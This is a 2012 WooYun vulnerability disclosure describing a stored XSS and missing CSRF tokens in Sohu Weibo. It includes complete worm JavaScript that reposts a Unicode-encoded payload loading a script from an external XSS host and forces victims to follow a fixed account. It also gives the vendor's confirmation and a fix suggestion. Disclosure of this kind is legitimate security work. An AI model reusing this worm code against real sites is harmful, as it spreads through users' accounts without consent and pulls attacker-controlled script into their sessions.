当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010167

漏洞标题:搜狐微博某处存储型小松鼠+顺便提一提相关接口未加上TOKEN

相关厂商:搜狐

漏洞作者: imlonghao

提交时间:2012-07-26 14:31

修复时间:2012-09-09 14:32

公开时间:2012-09-09 14:32

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-07-26: 细节已通知厂商并且等待厂商处理中
2012-07-26: 厂商已经确认,细节仅向厂商公开
2012-08-05: 细节向核心白帽子及相关领域专家公开
2012-08-15: 细节向普通白帽子公开
2012-08-25: 细节向实习白帽子公开
2012-09-09: 细节向公众公开

简要描述:

小松鼠很可爱,它可以让你的粉丝剧增!

详细说明:

今天给大家带来的是搜狐微博的XSS+蠕虫
主要演示过程。
先发一条微博,插图片
截包
其中的pics参数没有过滤
我们就从这里入手
后面没用的参数经过测试,删掉也行。。。
先闭合前面的标签,然后插JS
代码用unicode编码
在图片的后面插
然后直接插JS代码,同样unicode
OK
不过会蛋疼的错位。。。。
错位就不管了。。。、
下面是蠕虫,。
发微博+加关注
FID中有发微博的接口
搜狐微博有HTTPONLY,所以要COOKIES也没用,还不如加点关注,蠕虫一下。。。
蠕虫,发一条同样的微博就OK
下面是加关注。。。
找接口
PS,这样也可以加V?
就这样

var pkav={ ajax:function(){ var xmlHttp; try{ xmlHttp=new XMLHttpRequest(); }catch (e){ try{ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }catch (e){ try{ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ return false; } } } return xmlHttp; }, req:function(url,data,method,callback){ method=(method||"").toUpperCase(); method=method||"GET"; data=data||""; if(url){ var a=this.ajax(); a.open(method,url,true); if(method=="POST"){ a.setRequestHeader("Content-type","application/x-www-form-urlencoded"); } a.onreadystatechange=function(){ if (a.readyState==4 && a.status==200) { if(callback){ callback(a.responseText); } } }; if((typeof data)=="object"){ var arr=[]; for(var i in data){ arr.push(i+"="+encodeURIComponent(data[i])); } a.send(arr.join("&")); }else{ a.send(data||null); } } }, get:function(url,callback){ this.req(url,"","GET",callback); }, post:function(url,data,callback){ this.req(url,data,"POST",callback); } }; if(!window.__x){ pkav.post("http://t.sohu.com/twAction/insertTwitter","msg=XSS&pics=%5B%7B%22url%22%3A%22http%3A%2F%2Fs2.t.itc.cn%2Fmblog%2Fpic%2F20127_26_13%2Fs_37750499540004660.png%5Cu0022%5Cu003E%5Cu003C%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu0020%5Cu0073%5Cu0072%5Cu0063%5Cu003D%5Cu0068%5Cu0074%5Cu0074%5Cu0070%5Cu003A%5Cu002f%5Cu002f%5Cu0078%5Cu0073%5Cu0073%5Cu0065%5Cu0072%5Cu002e%5Cu006d%5Cu0065%5Cu002f%5Cu0055%5Cu005a%5Cu0048%5Cu0035%5Cu0036%5Cu0054%5Cu003E%5Cu003C%5Cu002f%5Cu0073%5Cu0063%5Cu0072%5Cu0069%5Cu0070%5Cu0074%5Cu003E%22%7D%5D",function(rs){}); pkav.post("http://t.sohu.com/follow/addfollows","act=follow&friendids=299748820&uid=299748820",function(rs){}); window.__x=1; }


我们以这个为例。
299748820
没有关注的。。
触发XSS
已关注。。
发微博的话因为错位看不到什么效果
也没有小号
COOKIES也是有的。。
END

漏洞证明:

http://115.com/file/dpufxi7t
提取密码:ixss

修复方案:

检查pics,如果有字母和数字以外的东西,通通报错。
相关接口加上TOKEN。。。。。

版权声明:转载请注明来源 imlonghao@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-07-26 16:00

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2012-07-26 15:00 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

  2. 2012-08-15 17:23 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @风萧萧 你是为5分呐喊么